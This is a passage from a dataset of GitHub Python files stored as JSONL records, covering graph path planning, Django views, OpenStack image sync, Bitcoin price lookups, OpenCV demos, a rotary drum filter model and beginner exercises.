nx.shortest_path_length(self.G, source=0, target=None, weight='None', method='dijkstra')\n # print(all_dist[0])\n max_dist_node = max(all_dist,key=all_dist.get)\n self.GV_start = [max_dist_node]\n all_dist = nx.shortest_path_length(self.G, source=max_dist_node, target=None, weight='None', method='dijkstra')\n self.GV_goal = [max(all_dist,key=all_dist.get)]\n # print(self.GV_start,self.GV_goal)\n # print(all_dist[self.GV_goal[0]])\n # input()\n\n def random_cuts(self):\n\n node_set = set(self.G.nodes)\n node_set.difference_update(self.GV_start+self.GV_goal)\n # print(node_set)\n\n def is_sep_set(n1,n2):\n n1, n2 = self.inverse_mapping[n1],self.inverse_mapping[n2]\n \n v1, v2 = slope*n1[0]-n1[1]+const, slope*n2[0]-n2[1]+const\n\n if v1*v2<0:\n return True\n elif v1*v2 == 0:\n if v1>0 or v2>0:\n return True\n else:\n return False\n else:\n return False\n \n \n for _ in range(self.cuts):\n valid_cut = False\n while valid_cut is False:\n cos = 0\n while cos==0:\n cos = random.uniform(-0.01,0.01)\n slope = random.uniform(0.99,1)/cos\n node_ = self.inverse_mapping[random.sample(node_set,1)[0]]\n # slope = 3\n # node_ = (1,0)\n const = -slope*node_[0] + node_[1]\n\n if is_sep_set(self.GV_start[0],self.GV_goal[0]):\n valid_cut = True\n \n for edge in self.G.edges:\n if is_sep_set(edge[0],edge[1]):\n self.impeded_edges.append(edge)\n \n # print(self.impeded_edges)\n # print(slope,node_)\n\n def pick_GV_start(self):\n '''This method can be used to randomly pick the GV start node'''\n node_set = set(self.G.nodes)\n return random.sample(node_set, 1)\n \n def pick_GV_goal(self):\n '''This method can be used to randomly pick the GV goal node'''\n node_set = set(self.G.nodes)\n return random.sample(node_set, 1)\n\n def pick_SV_start(self):\n '''This method can be used to randomly pick the SV start node'''\n node_set = set(self.G.nodes)\n return random.sample(node_set, 1)\n \n def add_impeded_edges(self, percent_impeded, unimp_cost_range ,imp_cost_range, SV_cost_range, service_cost_range):\n \n num_imp_edge = int(percent_impeded*len(self.G.edges))\n \n edges = list(self.G.edges)\n if self.cuts == 0:\n self.impeded_edges = random.sample( edges, k = num_imp_edge)\n \n self.impeded_edges = list(set(self.impeded_edges))\n unimpeded_edges = list(set(edges)-set(self.impeded_edges))\n\n for edge in self.impeded_edges:\n \n serv_cost = np.random.randint(service_cost_range[0],service_cost_range[1])\n imp_cost = np.random.randint(imp_cost_range[0] , imp_cost_range[1])\n unimp_cost = np.random.randint(unimp_cost_range[0] , unimp_cost_range[1])\n sv_cost = np.random.randint(SV_cost_range[0],SV_cost_range[1])\n \n ''' Need unimp_cost <= imp_cost-serv_cost '''\n\n self.G.add_edge(edge[0],edge[1],impeded_cost = imp_cost, unimpeded_cost = unimp_cost, SV_cost = sv_cost, service_cost = serv_cost, color = 'r')\n # self.G.add_edge(edge[0],edge[1],impeded_cost = 10, unimpeded_cost = 1, SV_cost = 1, service_cost = 0, color = 'r')\n\n for edge in unimpeded_edges:\n unimp_cost = np.random.randint(unimp_cost_range[0] , unimp_cost_range[1])\n imp_cost = unimp_cost\n sv_cost = np.random.randint(SV_cost_range[0],SV_cost_range[1])\n serv_cost = 0\n\n self.G.add_edge(edge[0],edge[1],impeded_cost = imp_cost, unimpeded_cost = unimp_cost, SV_cost = sv_cost, service_cost = serv_cost, color = 'k')\n # self.G.add_edge(edge[0],edge[1],impeded_cost = 10, unimpeded_cost = 10, SV_cost = 1, service_cost = 0, color = 'r')\n\n\n def add_obstacles(self, obstacle=None):\n if obstacle == None:\n remove_edges = []\n for node in self.G.nodes:\n if 
float(np.random.randint(11))/10 > 1:\n self.G.nodes[node]['obs'] = 1\n remove_edges.extend(self.G.edges(node)) \n else:\n self.G.nodes[node]['obs'] = 0 \n self.G.remove_edges_from(remove_edges)\n else:\n remove_edges = []\n for node in self.G.nodes:\n if node in obstacle:\n self.G.nodes[node]['obs'] = 1\n remove_edges.extend(self.G.edges(node))\n else:\n self.G.nodes[node]['obs'] = 0\n self.G.remove_edges_from(remove_edges)\n\n\n def node_relabel(self):\n \n m,n = self.grid_size\n \n mapping = {}\n self.inverse_mapping = {}\n \n for node in self.G.nodes:\n label = node[0]+1+node[1]*m\n mapping[node] = label\n self.inverse_mapping[label] = node \n \n self.G = nx.relabel_nodes(self.G,mapping)\n\n\n","repo_name":"abhay1220/ASPP-with-GPLAstar","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32639476778","text":"from django import template\nfrom page.models import Page\nregister = template.Library()\n\n@register.inclusion_tag(\"main/menu.html\")\ndef menu():\n out = {}\n pages = Page.objects.all()\n out['pages'] = pages\n return out\n","repo_name":"zdimon/course-2","sub_path":"blog/main/templatetags/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31078703766","text":"from __future__ import unicode_literals\n\nimport json\nimport logging\nimport copy\n\nfrom fleio.openstack.images import serializers\nfrom fleio.openstack.sync.handler import BaseHandler, retry_on_deadlock\n\nLOG = logging.getLogger(__name__)\n\n\nclass ImageEventHandler(BaseHandler):\n serializer_class = serializers.ImageSyncSerializer\n version_field = 'sync_version'\n\n def __init__(self):\n # NOTE(tomo): image.send not handled, it may not be needed\n # NOTE(erno): the events image.upload and image.activate were removed because on snapshot delete\n # these notifications can come after image.delete (in notifications version 1)\n self.event_handlers = {'image.create': self.create_or_update,\n 'image.update': self.create_or_update,\n 'image.prepare': self.create_or_update,\n 'image.delete': self.delete}\n\n def serialize(self, data, region, timestamp):\n improp = data.get('properties', dict())\n owner = data.get('owner', None)\n im_data = copy.deepcopy(data)\n im_data['region_id'] = region\n im_data[self.version_field] = self.get_version(timestamp)\n im_data['instance_uuid'] = improp.get('instance_uuid', None)\n # save volume snapshot id\n im_data['volume_snapshot_uuid'] = None\n if 'block_device_mapping' in improp:\n block_device_mapping = json.loads(improp.get('block_device_mapping', '[]'))\n block_device_mapping_dict = block_device_mapping[0] if len(block_device_mapping) else {}\n im_data['volume_snapshot_uuid'] = block_device_mapping_dict.get('snapshot_id', None)\n im_data['os_distro'] = improp.get('os_distro', None)\n im_data['hypervisor_type'] = improp.get('hypervisor_type', None)\n im_data['type'] = improp.get('image_type', 'template')\n im_data['hw_qemu_guest_agent'] = improp.get('hw_qemu_guest_agent', False) == 'yes'\n im_data['os_version'] = improp.get('os_version', None)\n im_data['architecture'] = improp.get('architecture', None)\n is_public = data.get('is_public', None)\n if is_public is not None:\n im_data['visibility'] = 'public' if is_public else data.get('visibility', 'private')\n if owner and len(owner) > 31:\n im_data['project_id'] = 
owner\n        return im_data\n\n    def delete(self, payload, region, timestamp):\n        image_id = payload.get('id', None)\n        if not image_id:\n            LOG.error('Unable to delete image without ID: {}'.format(payload))\n        return super(ImageEventHandler, self).delete(image_id, region, timestamp)\n\n\nclass ImageMemberEventHandler(BaseHandler):\n    serializer_class = serializers.ImageMemberSyncSerializer\n    version_field = 'sync_version'\n\n    def __init__(self):\n        self.event_handlers = {'image.member.create': self.create_or_update,\n                               'image.member.update': self.create_or_update,\n                               'image.member.delete': self.delete}\n\n    @retry_on_deadlock\n    def create_if_missing(self, member_id, image_id):\n        \"\"\"\n        We will try to create an Image Member object if one doesn't exist yet.\n        We need to do this here because Image Members do not have IDs in OpenStack\n        and our BaseHandler always requires an ID\n        \"\"\"\n        db_imm, created = self.model_class.objects.get_or_create(member_id=member_id, image_id=image_id,\n                                                                 defaults=dict(member_id=member_id, image_id=image_id))\n        return db_imm.id\n\n    def serialize(self, data, region, timestamp):\n        data[self.version_field] = self.get_version(timestamp)\n        # NOTE(tomo): ImageMember does not have an actual ID in OpenStack\n        # and as such, we need to fetch the object from DB by member_id and image_id\n        if 'member_id' in data and 'image_id' in data:\n            obj_id = self.create_if_missing(data['member_id'], data['image_id'])\n            data['id'] = obj_id\n        else:\n            raise ValueError('Received an invalid ImageMember data: {}'.format(data))\n        return data\n\n    def delete(self, payload, region, timestamp):\n        if payload.get('member_id', None) is not None and payload.get('image_id', None) is not None:\n            self.model_class.objects.filter(member_id=payload.get('member_id'),\n                                            image_id=payload.get('image_id')).delete()\n        else:\n            LOG.error('Unable to delete image member without member_id and image_id: {}'.format(payload))\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleio/openstack/images/event_handlers.py","file_name":"event_handlers.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12595885927","text":"import requests\nfrom pycoingecko import CoinGeckoAPI\n\n\ndef valor_btc(moeda: str = 'BRL', segunda_moeda=\"USD\"):\n    cg = CoinGeckoAPI()\n    result = cg.get_price(ids='bitcoin', vs_currencies='{},{}'.format(moeda, segunda_moeda), include_24hr_change='true')\n    moeda_valor = result['bitcoin'][moeda.lower()]\n    moeda_24_hrs = result['bitcoin']['{}_24h_change'.format(moeda.lower())] / 100\n\n    if segunda_moeda:\n        segunda_moeda_valor = result['bitcoin'][segunda_moeda.lower()]\n        segunda_moeda_24_hrs = result['bitcoin']['{}_24h_change'.format(segunda_moeda.lower())] / 100\n\n        return moeda_valor, moeda_24_hrs, segunda_moeda_valor, segunda_moeda_24_hrs\n    else:\n        return moeda_valor, moeda_24_hrs\n\n\ndef bloco_num():\n    api_link = \"https://blockchain.info/q/getblockcount\"\n\n    request = requests.get(api_link, timeout=180)\n    result = int(request.text)\n\n    return result\n\n\ndef block_date(block_num):\n    api_link = f\"https://blockchain.info/rawblock/{block_num}\"\n\n    request = requests.get(api_link, timeout=180)\n    result = request.json()\n\n    return int(result['time'])\n","repo_name":"eitchtee/BTCBipolar","sub_path":"bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
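The bitcoin.py record above pairs a CoinGecko spot-price lookup with two plain blockchain.info queries. A minimal usage sketch of those three helpers follows; the local module name `bitcoin` and the import path are assumptions for illustration, and only the function names and return shapes come from the record itself (network access is required):

import time
from bitcoin import valor_btc, bloco_num, block_date  # hypothetical local import

# Spot price in two currencies plus their 24h changes (returned as fractions, per the /100 above).
brl, brl_24h, usd, usd_24h = valor_btc('BRL', 'USD')
print(f'BTC/BRL {brl:,.2f} ({brl_24h:+.2%} 24h) | BTC/USD {usd:,.2f} ({usd_24h:+.2%} 24h)')

# Height of the chain tip and the age of its newest block, from the two blockchain.info endpoints.
tip = bloco_num()
age_min = (int(time.time()) - block_date(tip)) // 60
print(f'Block {tip} was mined about {age_min} minutes ago')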
+{"seq_id":"17768712929","text":"import json\n\ndef save(settings, filename):\n with open(filename, \"w\") as f:\n json.dump(settings, f)\n\ndef load(filename):\n try:\n with open(filename) as f:\n return json.load(f)\n except FileNotFoundError:\n return {}\n except json.decoder.JSONDecodeError:\n return {}","repo_name":"achen22/doubtfire-download-swin","sub_path":"jsonfile.py","file_name":"jsonfile.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29622308221","text":"# # Задача 2\ndef dd(a):\n b = []\n while a > 0:\n b.append(a % 10)\n a = a // 10\n b.reverse()\n return b\n\n\ndef create_full_sorted_list(l):\n l.sort(reverse=True)\n return list(map(dd, l))\n\n\nnums = [86, 85, 90, 7, 91]\nnums = create_full_sorted_list(nums)\n\n\n## Задача 3\ndef find_max(l):\n if len(l) > 1:\n max_ = find_max(l[1:])\n if l[0] < max_:\n return max_\n else:\n return l[0]\n if len(l) == 1:\n return l[0]\n\n\nl = [-1, -125125, 2151261, 0, 125215166, -1521267888]\nprint(find_max(l))\n# задача 4\nimport random\n\n\ndef find_colour(colours):\n list_of_colours = []\n for colour in colours:\n if colour[\"r\"] > colour[\"g\"] and colour[\"r\"] > colour[\"b\"]:\n list_of_colours.append(\"red\")\n elif colour[\"g\"] > colour[\"r\"] and colour[\"g\"] > colour[\"b\"]:\n list_of_colours.append(\"green\")\n elif colour[\"b\"] > colour[\"r\"] and colour[\"b\"] > colour[\"g\"]:\n list_of_colours.append(\"blue\")\n return list_of_colours\n\n\nbitmap = [\n {\n \"r\": random.randint(0, 255),\n \"g\": random.randint(0, 255),\n \"b\": random.randint(0, 255),\n }\n for i in range(20000)\n]\nprint(find_colour(bitmap))\n","repo_name":"saba070201/test_repo_suai","sub_path":"module1/p2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42105772452","text":"\"\"\"\nViews for the users app.\n\nThis module defines views for user-related actions, such as registration and profile management.\n\nFunctions:\n register: View for handling user registration.\n profile: View for managing user profiles.\n\n\"\"\"\n\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\n\n\ndef register(request):\n \"\"\"\n View for handling user registration.\n\n If the request method is POST and the registration form is valid, a new user account is created,\n and the user is redirected to the login page with a success message.\n\n If the request method is GET, the registration form is displayed.\n\n Args:\n request: The HTTP request.\n\n Returns:\n HttpResponse: Rendered registration page or a redirect to the login page.\n \"\"\"\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f\"Account created for {username}. 
Please Log in\")\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, \"users/register.html\", {'form': form})\n\n\n@login_required\ndef profile(request):\n \"\"\"\n View for managing user profiles.\n\n If the request method is POST and both the user update form and profile update form are valid,\n the user and profile information are updated, and a success message is displayed.\n\n If the request method is GET, the user and profile update forms are displayed.\n\n Args:\n request: The HTTP request.\n\n Returns:\n HttpResponse: Rendered profile page or a redirect to the profile page.\n \"\"\"\n\n if request.method == 'POST':\n user_update_form = UserUpdateForm(request.POST, instance=request.user)\n profile_update_form = ProfileUpdateForm(request.POST,\n request.FILES,\n instance=request.user.profile)\n if user_update_form.is_valid() and profile_update_form.is_valid():\n user_update_form.save()\n profile_update_form.save()\n messages.success(request, f\"Your account has been updated.\")\n return redirect('profile')\n\n else:\n user_update_form = UserUpdateForm(instance=request.user)\n profile_update_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': user_update_form,\n 'p_form': profile_update_form\n }\n\n return render(request, 'users/profile.html', context)\n","repo_name":"BarakMShalom/Django-website-blog","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27742143435","text":"import time\nimport csv\ndef rating():\n mainList = []\n f = open(\"Stock.txt\", \"rt\")\n f1 = csv.reader(f)\n for i in f1:\n if i != []:\n mainList.append(i)\n rate = []\n book = []\n stock = []\n edition = []\n price = []\n author = []\n count = 0\n for i in range(len(mainList)):\n price.append(mainList[i][3])\n book.append(mainList[i][0])\n stock.append(mainList[i][2])\n edition.append(mainList[i][7])\n rate.append(mainList[i][5])\n author.append(mainList[i][1])\n averagerate = 0\n for i in range(len(price)):\n averagerate+=float(rate[i])\n averagerate = averagerate /len(rate)\n print(\" \"*50+\"[particular] [all]\")\n asking = input(\" \"*50+\"Enter from above here \")\n if asking == \"all\":\n print(\" \"*50+\"Here is your data configuration loading............\")\n time.sleep(1)\n print(\" \"*50+\"book rating\")\n for i in range(len(mainList)):\n print(book[i]+\" \"+rate[i])\n print(\" \"*50+\"average rating of all book availble in this store is \",averagerate)\n elif asking == \"particular\":\n print(\" \"*50+\"Here is your data configuration loading ......\")\n time.sleep(1)\n count = 0\n d = 0\n bookname= input(\" \"*50+\"Enter author name :\")\n for i in range(len(mainList)):\n if bookname==mainList[i][0]:\n count += 1\n if count == 1:\n print(\" \"*50+\"book rating\")\n print(\" \"*50+author[i]+\"|| rate \"+rate[i]+\"|| edition \"+edition[i])\n d +=float(rate[i])\n if count!=0:\n avar = d/count\n print(\" \"*50+\"Average rating of this book is \" + str(avar))\n\n if count==0:\n print(\" \"*50+\"Not a single book can be found of this name\")\n else:\n print(\" \"*50+\" You had not written properly what you want to find \")\n return 
rating()\n\n\n\n\n\n\n\n\n\n","repo_name":"rushabhshah2002/bookLibrarySystem","sub_path":"bookratingsearch.py","file_name":"bookratingsearch.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45158422008","text":"'''\nLoad two lists, and update the first list with the elements that are in the second but not in the first\n'''\n\n#lista1 = [12,23,34]\n\nlista2 = ['qwe','asd','zxc']\n'''\ncont = 0\n\nfor x in lista2:\n\tif cont <= len(lista2):\n\t\tlista1[cont] = lista2[x]\n\t\tcont += 1\n\nprint(lista1)\n'''\n\noriginar = list(lista2)\n\nlista2.reverse()\n\nprint(originar)\nprint(lista2)","repo_name":"Dihue/Course-Python","sub_path":"Informatorio/4-List_Tupla_Dicc/desafio01k.py","file_name":"desafio01k.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"729685339","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nmotion_list=[]\nimport cv2, time,pandas\nstatic_back = None\nvideo = cv2.VideoCapture(0)\nwhile True:\n\tcheck, frame = video.read()\n\tmotion = 0\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tgray = cv2.GaussianBlur(gray, (21, 21), 0)\n\tif static_back is None:\n\t\tstatic_back = gray\n\t\tcontinue\n\tdiff_frame = cv2.absdiff(static_back, gray)\n\tthresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1]\n\tthresh_frame = cv2.dilate(thresh_frame, None, iterations = 2)\n\tcnts,_ = cv2.findContours(thresh_frame.copy(),\n\t\t\t\t\tcv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\tfor contour in cnts:\n\t\tif cv2.contourArea(contour) < 10000:\n\t\t\tcontinue\n\t\tmotion = 1\n\t\t(x, y, w, h) = cv2.boundingRect(contour)\n\t\t\n\t\tcv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n \n\tmotion_list.append(motion)\n\tcv2.imshow(\"Gray Frame\", gray)\n\tcv2.imshow(\"Difference Frame\", diff_frame)\n\tcv2.imshow(\"Threshold Frame\", thresh_frame)\n\tcv2.imshow(\"Color Frame\", frame)\n\tkey = cv2.waitKey(100)\n\tif key == ord('q'):\n\t\tbreak\nvideo.release()\ncv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\n\nimage1 = cv2.imread('bp1.jpg')\n\nimg = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)\n\nthresh1 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n\t\t\t\t\t\t\t\t\t\tcv2.THRESH_BINARY, 199, 5)\n\nthresh2 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n\t\t\t\t\t\t\t\t\t\tcv2.THRESH_BINARY, 199, 5)\nret,thresh3 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)\n \ncv2.imshow('Adaptive Mean', thresh1)\ncv2.imshow('Adaptive Gaussian', thresh2)\ncv2.imshow('n', thresh3)\n\n \nif cv2.waitKey(0) & 0xff == 27:\n\tcv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\n \nimg1 = cv2.imread('1.png') \nimg2 = cv2.imread('input2.png')\ndim = (500, 500)\n\ndest_and = cv2.bitwise_and(img2, img1, mask = None)\n\ncv2.imshow('Bitwise And', dest_and)\n\nif cv2.waitKey(0) & 0xff == 27:\n    cv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimport cv2\nimport numpy as np\n \nimg1 = cv2.imread('11.png') \nimg2 = cv2.imread('12.png')\ndim = (500, 500)\n\n \ndest_and = cv2.bitwise_or(img2, img1, mask = None)\n \ncv2.imshow('Bitwise or', dest_and)\n \n \nif cv2.waitKey(0) & 0xff == 27:\n    cv2.destroyAllWindows()\n\n\n# In[3]:\n\n\nimport cv2\nimport numpy as np\n\nimg1 = cv2.imread('11.png') \nimg2 = cv2.imread('12.png')\ndim = (500, 500)\n\ndest_and = cv2.bitwise_not(img2, mask = 
thresh1 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n\t\t\t\t\t\t\t\t\t\tcv2.THRESH_BINARY, 199, 5)\n\nthresh2 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n\t\t\t\t\t\t\t\t\t\tcv2.THRESH_BINARY, 199, 5)\nret,thresh3 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)\n \ncv2.imshow('Adaptive Mean', thresh1)\ncv2.imshow('Adaptive Gaussian', thresh2)\ncv2.imshow('n', thresh3)\n\n \nif cv2.waitKey(0) & 0xff == 27:\n\tcv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\n \nimg1 = cv2.imread('1.png') \nimg2 = cv2.imread('input2.png')\ndim = (500, 500)\n\ndest_and = cv2.bitwise_and(img2, img1, mask = None)\n\ncv2.imshow('Bitwise And', dest_and)\n\nif cv2.waitKey(0) & 0xff == 27:\n    cv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimport cv2\nimport numpy as np\n \nimg1 = cv2.imread('11.png') \nimg2 = cv2.imread('12.png')\ndim = (500, 500)\n\n \ndest_and = cv2.bitwise_or(img2, img1, mask = None)\n \ncv2.imshow('Bitwise or', dest_and)\n \n \nif cv2.waitKey(0) & 0xff == 27:\n    cv2.destroyAllWindows()\n\n\n# In[3]:\n\n\nimport cv2\nimport numpy as np\n\nimg1 = cv2.imread('11.png') \nimg2 = cv2.imread('12.png')\ndim = (500, 500)\n\ndest_and = cv2.bitwise_not(img2, mask = None)\n\ncv2.imshow('Bitwise not', dest_and)\n\nif cv2.waitKey(0) & 0xff == 27:\n    cv2.destroyAllWindows()\n\n\n# In[5]:\n\n\nimport cv2\nimport numpy as np\n\nimg1 = cv2.imread('11.png')\nimg2 = cv2.imread('12.png')\n\ndest_xor = cv2.bitwise_xor(img1, img2, mask = None)\n\ncv2.imshow('Bitwise XOR', dest_xor)\n\nif cv2.waitKey(0) & 0xff == 27:\n\tcv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Adithya65/OPENCV_GECBH","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26889114957","text":"import matplotlib.pyplot as plt\nimport math\nfrom numpy.lib.financial import irr\nfrom sklearn import metrics\nfrom scipy.integrate import odeint\nimport numpy as np\n\n\"\"\" ------ DYNAMIC SIMULATION: FILTRATION IN A ROTARY VACUUM DRUM ------ \"\"\"\n### Bioseparaciones (2011), Tejeda, et. al\n### Operaciones unitarias en ingeniería química (2007), McCabe, et al\n### Solid/Liquid separations Principles of Industrial Filtration (2005) Wakeman, Tarleton\n\nclass RVDF:\n    def __init__(self,P_diff,rd,L,Af,tf, filtration_angle,wsh_angle,dew_angle1,dew_angle2,w,Rm,nivel):\n        '''\n        ROTARY VACUUM DRUM FILTER PARAMETERS\n\n        P_diff: Vacuum pressure in the drum [Pa]\n        rd: Drum radius [m]\n        L: Drum length [m]\n        Af: Filtration area [m2]\n        tf: Filtration time\n        filtration_angle: Drum filtration angle [°]\n        wsh_angle: Drum washing angle [°]\n        dew_angle: Drum dewatering angle [°]\n        w: Rotation speed [rpm]\n        Rm: Filter medium resistance\n        nivel: Slurry tank level []\n        '''\n        self.P_diff = P_diff # Pressure drop [Pa]\n        self.rd = rd # [m]\n        self.L = L # [m]\n        self.filtration_angle = filtration_angle # [°]\n        self.wsh_angle = wsh_angle # [°]\n        self.dew_angle1 = dew_angle1 # [°]\n        self.dew_angle2 = dew_angle2 # [°]\n        self.w = w # [rpm]\n        self.Af = Af # Filtration area [m2]\n        self.tf = tf # Filtration time [s]\n        self.Rm = Rm # Filter medium resistance\n        self.nivel = nivel # tank level []\n\n    def drum_filter_area(rd,L,filtration_angle):\n        '''\n        DRUM FILTRATION AREA CALCULATION\n        rd: Drum radius [m]\n        L: Drum length [m]\n        filtration_angle: Drum filtration angle [°]\n        '''\n        A = 2*math.pi*rd*L*(filtration_angle/360)\n        \n        return A\n\n    def angle_to_time(phi,omega):\n        '''\n        CONVERSION FROM FILTRATION ANGLE TO FILTRATION TIME\n        phi: Angle [°]\n        omega: Drum rotation speed [rpm]\n        '''\n        phi = np.deg2rad(phi)\n        omega = omega/60 # revolutions per min to revolutions per second\n        tf = phi/(2*math.pi*omega) # [s]\n\n        return tf\n\n    
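# Quick sanity check with made-up numbers (not from the original script): a\n    # 120° arc on a drum turning at 0.5 rpm gives angle_to_time(120, 0.5)\n    # = (2*pi/3)/(2*pi*(0.5/60)) = 40 s of form time per revolution.\n\n    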
def real_filtration_angle(filtration_angle, dew1_angle, nivel):\n        theta_perdido = np.rad2deg(np.arcsin(1-nivel))\n        filtration_angle = filtration_angle - 2*theta_perdido\n        dew1_angle = dew1_angle + theta_perdido\n\n        return filtration_angle, dew1_angle\n\nclass slurry_cake:\n\n    \"\"\" SLURRY AND CAKE PARAMETERS \"\"\"\n\n    def __init__(self,alpha,u,c,k,epsilon,solid_dens,filtrate_dens,surface_tension,incompressible,s):\n        self.u = u # Suspension viscosity [Pa*s]\n        self.c = c # Dry solids per unit volume of filtrate [kg/m3]\n        self.k = k # Cake permeability [m2]\n        self.s = s # compressibility index []\n        self.epsilon = epsilon # Cake porosity []\n        self.solid_dens = solid_dens # Solids density [kg/m3]\n        self.filtrate_dens = filtrate_dens # Filtrate density [kg/m3]\n        self.surface_tension = surface_tension # Filtrate surface tension [N/m]\n        self.incompressible = incompressible # True / False\n        self.alpha = alpha # Specific cake resistance [m/kg]\n    \n\n    def calc_alpha(incompressible,k,solid_dens,epsilon,alpha_prima,P_diff,s):\n\n        \"\"\" DYNAMIC CAKE RESISTANCE CALCULATION \"\"\"\n\n        if incompressible:\n            s = 0\n            alpha = 1/(k*solid_dens*(1-epsilon)) # [m/kg]\n        else:\n            alpha = alpha_prima*(P_diff**s) # [m/kg]\n\n        return alpha","repo_name":"juanmaro97/RVF_model","sub_path":"RVDF.py","file_name":"RVDF.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26466198537","text":"# create a CashMachine class that will raise exceptions:\r\n# - if the amount is wrong (does not divide by 50) WrongAmountError\r\n# - if the banknotes cannot be dispensed EmptyError\r\n# - if there are too many banknotes in the drawer BasketFullError\r\n\r\nfrom Obiekty_obiektowosc.Obiekty_Zad_4_bankomat_wersjawykladowcy import CashMachine\r\nfrom Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu import *\r\n\r\n\r\nclass CashMachineLimit(CashMachine): # the CashMachine class had to be imported from \"Obiekty_Zad_4_bankomat_wersjawykladowcy\"\r\n    def __init__(self, limit):\r\n        super().__init__()\r\n        self._limit = limit\r\n\r\n    def put_money(self, banknotes):\r\n        if len(self._szuflada) + len(banknotes) > self._limit:\r\n            raise BasketFullError # handles the special case where we try to put in too much\r\n        super().put_money(banknotes) # this comes from the superclass\r\n\r\n    def withdraw_money(self, amount):\r\n        if amount % 50 != 0:\r\n            raise WrongAmountError\r\n\r\n        wyplata = super().withdraw_money(amount)\r\n        if not wyplata: # at first it was: if sum(wyplata) != amount:\r\n            raise EmptyError\r\n\r\n        return wyplata\r\n
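\r\n# A hedged sketch (the real definitions live in Obiekty_Zad_7_wyjatki_dla_bankomatu\r\n# and are not shown here): the except clause below assumes a common base class, roughly:\r\n# class CashMachineError(Exception): pass\r\n# class WrongAmountError(CashMachineError): pass\r\n# class EmptyError(CashMachineError): pass\r\n# class BasketFullError(CashMachineError): pass\r\n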
\r\n\r\ncm = CashMachineLimit(5) # how many banknotes the drawer holds\r\n\r\ntry:\r\n    cm.put_money([100,200,100,50,100,100]) # ==> BasketFullError\r\n    cm.put_money([200,100,100])\r\n    cm.withdraw_money(150) # ==> EmptyError, this error is raised when the withdrawal cannot be fulfilled\r\n    cm.withdraw_money(140) # ==> WrongAmountError, this error is raised when the amount does not divide by 50\r\nexcept CashMachineError as a: # catch the error and bind it to a variable\r\n    print('hooray, we got an error :) ')\r\n    print(type(a))\r\n\r\n\r\n\"\"\"\r\nraise WrongAmountError # you need to raise e.g. an error from the file \"Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu\"\r\n                       # what then appears at the top, \"from Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu import WrongAmountError\",\r\n                       # I replace with \"from Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu import *\"\r\nAfter importing we can remove or comment out this 